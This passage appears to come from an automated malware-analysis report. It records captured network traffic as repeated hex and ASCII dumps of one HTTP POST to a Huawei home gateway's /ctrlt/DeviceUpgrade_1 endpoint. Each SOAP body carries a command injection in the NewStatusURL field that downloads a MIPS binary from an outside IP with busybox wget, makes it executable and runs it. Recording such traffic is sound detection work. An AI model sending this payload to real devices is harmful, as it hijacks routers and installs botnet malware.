6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 